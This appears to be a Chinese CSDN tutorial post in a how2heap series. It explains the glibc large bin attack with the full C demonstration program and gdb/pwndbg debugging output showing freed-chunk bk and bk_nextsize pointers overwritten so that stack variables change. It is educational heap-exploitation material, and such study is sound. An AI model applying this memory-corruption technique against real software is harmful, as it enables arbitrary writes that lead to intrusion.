从零开始学howtoheap:理解fastbins的​large_bin攻击

原创 已于 2025-04-08 12:02:35 修改 · 871 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #系统安全 #安全 #安全架构

于 2024-02-14 13:06:46 首次发布

 how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客

1.fastbins的large_bin攻击

根据原文描述跟 unsorted bin attack 实现的功能差不多https://blog.csdn.net/weixin_44626085/article/details/136105051,都是把一个地址的值改为一个很大的数

先来看一下目标:
stack_var1 (0x7fffffffe590): 0
stack_var2 (0x7fffffffe598): 0

分配第一个 large chunk: 0x603000
再分配一个 fastbin 大小的 chunk,来避免 free 的时候下一个 large chunk 与第一个合并了

申请第二个 large chunk 在: 0x603360
同样在分配一个 fastbin 大小的 chunk 防止合并掉

最后申请第三个 large chunk 在: 0x6037a0
申请一个 fastbin 大小的防止 free 的时候第三个 large chunk 与 top chunk 合并

free 掉第一个和第二个 chunk,他们会被放在 unsorted bin 中 [ 0x603360 <--> 0x603000 ]

现在去申请一个比他俩小的,然后会把第一个分割出来,第二个则被整理到 largebin 中,第一个剩下的会放回到 unsortedbin 中 [ 0x6030a0 ]

free 掉第三个,他会被放到 unsorted bin 中: [ 0x6037a0 <--> 0x6030a0 ]

假设有个漏洞,可以覆盖掉第二个 chunk 的 "size" 以及 "bk"、"bk_nextsize" 指针
减少释放的第二个 chunk 的大小强制 malloc 把将要释放的第三个 large chunk 插入到 largebin 列表的头部(largebin 会按照大小排序)。覆盖掉栈变量。覆盖 bk 为 stack_var1-0x10,bk_nextsize 为 stack_var2-0x20

再次 malloc,会把释放的第三个 chunk 插入到 largebin 中,同时我们的目标已经改写了:
stack_var1 (0x7fffffffe590): 0x6037a0
stack_var2 (0x7fffffffe598): 0x6037a0
 

2.large_bin_attack 演示程序

#include<stdio.h>
#include<stdlib.h>
 
int main()
{
    fprintf(stderr, "根据原文描述跟 unsorted bin attack 实现的功能差不多,都是把一个地址的值改为一个很大的数\n\n");

    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;

    fprintf(stderr, "先来看一下目标:\n");
    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

    unsigned long *p1 = malloc(0x320);
    fprintf(stderr, "分配第一个 large chunk: %p\n", p1 - 2);

    fprintf(stderr, "再分配一个 fastbin 大小的 chunk,来避免 free 的时候下一个 large chunk 与第一个合并了\n\n");
    malloc(0x20);

    unsigned long *p2 = malloc(0x400);
    fprintf(stderr, "申请第二个 large chunk 在: %p\n", p2 - 2);

    fprintf(stderr, "同样在分配一个 fastbin 大小的 chunk 防止合并掉\n\n");
    malloc(0x20);

    unsigned long *p3 = malloc(0x400);
    fprintf(stderr, "最后申请第三个 large chunk 在: %p\n", p3 - 2);
 
    fprintf(stderr, "申请一个 fastbin 大小的防止 free 的时候第三个 large chunk 与 top chunk 合并\n\n");
    malloc(0x20);
 
    free(p1);
    free(p2);
    fprintf(stderr, "free 掉第一个和第二个 chunk,他们会被放在 unsorted bin 中 [ %p <--> %p ]\n\n", (void *)(p2 - 2), (void *)(p2[0]));

    malloc(0x90);
    fprintf(stderr, "现在去申请一个比他俩小的,然后会把第一个分割出来,第二个则被整理到 largebin 中,第一个剩下的会放回到 unsortedbin 中 [ %p ]\n\n", (void *)((char *)p1 + 0x90));

    free(p3);
    fprintf(stderr, "free 掉第三个,他会被放到 unsorted bin 中: [ %p <--> %p ]\n\n", (void *)(p3 - 2), (void *)(p3[0]));

    fprintf(stderr, "假设有个漏洞,可以覆盖掉第二个 chunk 的 \"size\" 以及 \"bk\"、\"bk_nextsize\" 指针\n");
    fprintf(stderr, "减少释放的第二个 chunk 的大小强制 malloc 把将要释放的第三个 large chunk 插入到 largebin 列表的头部(largebin 会按照大小排序)。覆盖掉栈变量。覆盖 bk 为 stack_var1-0x10,bk_nextsize 为 stack_var2-0x20\n\n");

    p2[-1] = 0x3f1;
    p2[0] = 0;
    p2[2] = 0;
    p2[1] = (unsigned long)(&stack_var1 - 2);
    p2[3] = (unsigned long)(&stack_var2 - 4);

    malloc(0x90);
    fprintf(stderr, "再次 malloc,会把释放的第三个 chunk 插入到 largebin 中,同时我们的目标已经改写了:\n");
    fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
    return 0;
}

3.调试large_bin_attack 

3.1 获得可执行程序 

gcc -g large_bin_attack .c -o large_bin_attack 

3.2 第一次调试程序

root@pwn_test1604:/ctf/work/how2heap# gcc -g large_bin_attack .c -o large_bin_attack 
root@pwn_test1604:/ctf/work/how2heap# gdb ./large_bin_attack 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./large_bin_attack ...done.
pwndbg> r
Starting program: /ctf/work/how2heap/large_bin_attack  
根据原文描述跟 unsorted bin attack 实现的功能差不多,都是把一个地址的值改为一个很大的数

先来看一下目标:
stack_var1 (0x7fffffffe590): 0
stack_var2 (0x7fffffffe598): 0

分配第一个 large chunk: 0x603000
再分配一个 fastbin 大小的 chunk,来避免 free 的时候下一个 large chunk 与第一个合并了

申请第二个 large chunk 在: 0x603360
同样在分配一个 fastbin 大小的 chunk 防止合并掉

最后申请第三个 large chunk 在: 0x6037a0
申请一个 fastbin 大小的防止 free 的时候第三个 large chunk 与 top chunk 合并

free 掉第一个和第二个 chunk,他们会被放在 unsorted bin 中 [ 0x603360 <--> 0x603000 ]

现在去申请一个比他俩小的,然后会把第一个分割出来,第二个则被整理到 largebin 中,第一个剩下的会放回到 unsortedbin 中 [ 0x6030a0 ]

free 掉第三个,他会被放到 unsorted bin 中: [ 0x6037a0 <--> 0x6030a0 ]

假设有个漏洞,可以覆盖掉第二个 chunk 的 "size" 以及 "bk"、"bk_nextsize" 指针
减少释放的第二个 chunk 的大小强制 malloc 把将要释放的第三个 large chunk 插入到 largebin 列表的头部(largebin 会按照大小排序)。覆盖掉栈变量。覆盖 bk 为 stack_var1-0x10,bk_nextsize 为 stack_var2-0x20

再次 malloc,会把释放的第三个 chunk 插入到 largebin 中,同时我们的目标已经改写了:
stack_var1 (0x7fffffffe590): 0x6037a0
stack_var2 (0x7fffffffe598): 0x6037a0
[Inferior 1 (process 157) exited normally]
pwndbg>

3.3 第二次调试程序

3.3.1 ​设置断点第32行并走起

​ 该技术可用于修改任意地址的值,例如栈上的变量stack_var1和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在fastbin attack 中用于修改全局变量global_max_fast为一个很大的值。

​ 首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。

wndbg> b 32

Breakpoint 1 at 0x400850: file large_bin_attack .c, line 32.
pwndbg> r
Starting program: /ctf/work/how2heap/large_bin_attack  
根据原文描述跟 unsorted bin attack 实现的功能差不多,都是把一个地址的值改为一个很大的数

先来看一下目标:
stack_var1 (0x7fffffffe590): 0
stack_var2 (0x7fffffffe598): 0

分配第一个 large chunk: 0x603000
再分配一个 fastbin 大小的 chunk,来避免 free 的时候下一个 large chunk 与第一个合并了

申请第二个 large chunk 在: 0x603360
同样在分配一个 fastbin 大小的 chunk 防止合并掉

最后申请第三个 large chunk 在: 0x6037a0
申请一个 fastbin 大小的防止 free 的时候第三个 large chunk 与 top chunk 合并


Breakpoint 1, main () at large_bin_attack .c:33
33          free(p1);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────
 RAX  0x603bc0 ◂— 0x0
 RBX  0x0
 RCX  0x7ffff7dd1b20 (main_arena) ◂— 0x100000000
 RDX  0x603bc0 ◂— 0x0
 RDI  0x0
 RSI  0x603be0 ◂— 0x0
 R8   0x5f
 R9   0x7ffff7dd2540 (_IO_2_1_stderr_) ◂— 0xfbad2887
 R10  0x1
 R11  0x246
 R12  0x4005b0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffe6a0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe5c0 —▸ 0x400a10 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffe590 ◂— 0x0
 RIP  0x400850 (main+426) ◂— mov    rax, qword ptr [rbp - 0x20]
────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────────────────────────
 ► 0x400850 <main+426>    mov    rax, qword ptr [rbp - 0x20]
   0x400854 <main+430>    mov    rdi, rax
   0x400857 <main+433>    call   free@plt <0x400540>
 
   0x40085c <main+438>    mov    rax, qword ptr [rbp - 0x18]
   0x400860 <main+442>    mov    rdi, rax
   0x400863 <main+445>    call   free@plt <0x400540>
 
   0x400868 <main+450>    mov    rax, qword ptr [rbp - 0x18]
   0x40086c <main+454>    mov    rax, qword ptr [rax]
   0x40086f <main+457>    mov    rcx, rax
   0x400872 <main+460>    mov    rax, qword ptr [rbp - 0x18]
   0x400876 <main+464>    lea    rdx, [rax - 0x10]
─────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────
In file: /ctf/work/how2heap/large_bin_attack .c
   28     fprintf(stderr, "最后申请第三个 large chunk 在: %p\n", p3 - 2);
   29  
   30     fprintf(stderr, "申请一个 fastbin 大小的防止 free 的时候第三个 large chunk 与 top chunk 合并\n\n");
   31     malloc(0x20);
   32  
 ► 33     free(p1);
   34     free(p2);
   35     fprintf(stderr, "free 掉第一个和第二个 chunk,他们会被放在 unsorted bin 中 [ %p &
最低0.47元/天 解锁文章

新学期VIP享超值加赠
how2heap-2.23-03-fastbin_dup_consolidate
blind cat
01-04 549
因为large chunk需要的空间较大,会尝试将fastbin中的chunk合并转移到unsortedbin,并将相邻下一chunk的pre_in_use置0。在通过申请large chunk时,会触发malloc_consolidate,会将chunk a放入到unsorted bin->small bin,此时下一个chunk b的prev_inuse清零。现在就可以在chunk a中伪造chunk,释放下一个chunk b,从而产生unlink,通过unlink进行利用。
从零开始howtoheap理解glibc分配机制和UAF漏洞利用
weixin_44626085的博客
02-09 1350
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。
从零开始howtoheapfastbins的house_of_spirit攻击1
weixin_44626085的博客
02-11 1109
伪造chunk时需要绕过一些检查,首先是标志位,PREV_INUSE位并不影响 free的过程,但IS_MMAPPED位和位都要为零。其次,在64位系统中fast chunk的大小要在 32~128 字节之间。最后,是next chunk的大小,必须大于2*SIZE_SZ(即大于16),小于(即小于128kb),才能绕过对next chunk大小的检查。 所以house_of_spirit的主要目的是,当我们伪造的fake chunk内部存在不可控区域时,运用这一技术可以将这片区域变成可控的。
从零开始howtoheap理解fastbins的堆块重叠的问题2
weixin_44626085的博客
02-13 1309
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。为了保证堆块稳定性,我们至少需要让 prev_inuse 为 1,确保 p1 不会被认为是空闲的堆块。malloc 将会把前面 free 的 p2 分配给我们(p2 的 size 已经被改掉了)这时候通过编辑 p4 就可以修改 p3 的内容,修改 p3 也可以修改 p4 的内容。现在让我们分配另一个块,其大小等于块p2注入大小的数据大小。给他们分别填充"1""2""3"
好好说话之Large Bin Attack
hollk’s blog
01-20 5749
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attack和House系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
large bin attack & house of strom
seaaseesa的博客
06-12 1335
large bin attack & house of strom large bin attack是一种堆利用手法,而house of strom则是在large bin attack的基础上借用unsorted bin来达到任意地址分配,首先我们从源码入手来分析large bin attack原理,然后再讲讲house of strom的原理,接着再看几个题目。 为例方便分析,以2.23为例,新版本有tcache的情况类似,只需填满tcache bin绕过tcache即可。 在free的时
从零开始howtoheap理解fastbinsunsorted bin攻击
weixin_44626085的博客
02-13 1184
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。
从零开始howtoheap理解fastbins的double-free攻击
weixin_44626085的博客
02-09 1592
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来习。环境可参见从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客 1.fastbins的double-free攻击 下面的程序展示了fastbins的double-free攻击,可以泄露出一块已经被分配的内存指针。fastbins 可以看成一个后进先出的栈,使用单链表来实现,通过fastbin->fd来遍历。由于free的过程会对free list做检查
从零开始howtoheapfastbins的house_of_spirit攻击3
weixin_44626085的博客
02-12 1181
house_of_spirit是一种fastbins攻击方法,通过构造fake chunk,然后将其free掉,就可以在下一次malloc时返回fake chunk的地址,即任意我们可控的区域。所以利用的第一步不是去控制一个 chunk,而是控制传给 free 函数的指针,将其指向一个fake chunk。所以 fake chunk的伪造是关键。通过溢出下一个chunk的size字段,攻击者能够在堆中创造出重叠的内存块,从而达到改写其他数据的目的。再结合其他的利用方式,同样能够获得程序的控制权。
【我的 PWN 习手札】Largebin Attack(< glibc-2.30)
Mr_Fmnwon的博客
09-18 1132
Largebin 与 smallbin unsortedbin 在组织结构上,除了通过 fd 和 bk 字段的双向链表组织,还存在fd_nextsize 和 bk_nextsize 字段。因此,当进行 free 或者 malloc 时,这些字段有着与此前不同的写逻辑。largebin attack 就是利用 largebin 的这一组织特性进行利用的。
好好说话之Fastbin Attack(2):House Of Spirit
hollk’s blog
10-30 4207
Fastbin Attack的第二种攻击方式House Of Spirit,相对来说是double free的升华。在检查绕过的时候会相对麻烦一点,其他的地方还是挺简单的,如果上一篇文上你领悟的很好的话,这篇文章也不会很难理解。 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
深入浅出讲解Largebin attack
2302_79542511的博客
08-14 869
1.首先需要把一个可控的堆块送入largebin,设为chunk12.利用uaf或者其他手段,修改chunk1的bk为triggr_addr1-0x10,chunk1的bk_nextsize修改为triggr_addr2-0x20。3.再free一个属于largebin范围的chunk2,然后malloc一个大堆块,就能做到largebin_attack
[总结型]记CTF PWN中过气的堆利用
easy_level1的博客
04-15 1895
目录前言不再好用的unsorted bin attack不可能的tcache double free 前言 how2heap(https://github.com/shellphish/how2heap)可以说是目前"权威"的glibc中的heap exploitation techniques文档。在术界近年的一些顶会文章也有引用这个github项目。 攻防对抗是一直持续发展的,很容易在习中,复现一些过时的攻击技术出现困难,原因就是已经有补丁打上了。本文大致总结一些在比赛中常见的过时技术,持续更新…吧
[how2heap] 前置说明(1)
最新发布
Lt95625142的博客
12-04 828
快速存储小块,无需合并。临时进入,稍后转移到合适的small bin。临时进入,然后按大小排序插入到large bin。所有释放块的中转站,优先满足后续分配请求。这里本质上要对应free的块大小来的,这个在后面我们会重点说一下,以及针对他们的攻击手段,这里就先简单地放个介绍。
CTF 用户态ptmalloc pwn总结(一)
weixin_41918450的博客
09-24 996
kernel pwn题不准备以总结的方式来写,准备每一道题一篇文章专门分析,有很多题网上都有不少解析,我只在github提供的脚本基础上进行复现和分析(因为能力不够,比赛时kernel pwn做不出,只能赛后复现了) 准备讲一下这三道题,关于强网杯的两道题其实是csaw2010的两道题进行了一些修改。最后会写一篇文章进行专门的总结,关于在这三道题复现过程中的问题以及一些利用技巧。 强网杯2018 ...
how2heap习笔记(1)
发蝴蝶和大脑斧的博客
12-28 2303
1.first_fit.c 就是堆的先进后出,malloc取最近free的大小大于请求的chunk,不是fastbin,fastbin没有最低位显示前一块。 2.fastbin_dup.c #include &amp;amp;amp;amp;amp;amp;lt;stdio.h&amp;amp;amp;amp;amp;amp;gt; #include &amp;amp;amp;amp;amp;amp;lt;stdlib.h&amp;amp;amp;amp;amp;am
linux适当堆内存,linux堆内存漏洞利用之fastbin
weixin_42245967的博客
04-30 449
背景介绍在前一节主要介绍了Glibc的堆内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc堆内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为:fastbin攻击smallbin攻击largebin攻击unsorted bin攻击top chunk的攻击本文主要介绍fastbin攻击fastbin漏洞利用具体的fastbin的介绍请参考前一节和 Linux堆内...
pwn工具箱之fastbin attack
jmp esp
05-22 2312
fastbin attack基本信息 利用类型: 堆利用 堆利用类型: 针对fastbin的利用 利用思想: 利用fastbin的free只检查是否和上一个freechunk相等,使得同一个chunk两次进入free list,造成UAF,可以更改fastbin free chunk的fd信息,最终分配一个特定地址 利用难点 需要能够两次free同一个chunk 更改fd的时候,为了能够在之后的ma
Linux下fastbin利用小结——fd覆盖与任意地址free(House of Spirit)
weixin_30361641的博客
09-12 213
linux下的fastbin是ctf中pwn题的重点出题点。去年(2015)中,XCTF就有两站是使用fastbin的利用作为pwn400的压轴题来出现,这也是我刚开始接触fastbin的利用,参考了k0sh1师傅写在freebuf上的一篇文章。我写了几个demo来说明问题。 目录 1.关于fastbin 2.覆盖fd指针实现利用 3.任意地址free实现利用(House of Spiri...
Python库资源介绍:large_image_source_mapnik-1.8.1-whl
资源摘要信息:"Python库 | large_image_source_mapnik-1.8.1-py3-none-any.whl" ...以上详细阐述了标题、描述、标签以及文件名称列表中的知识点,有助于理解large_image_source_mapnik库及其在Python中的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值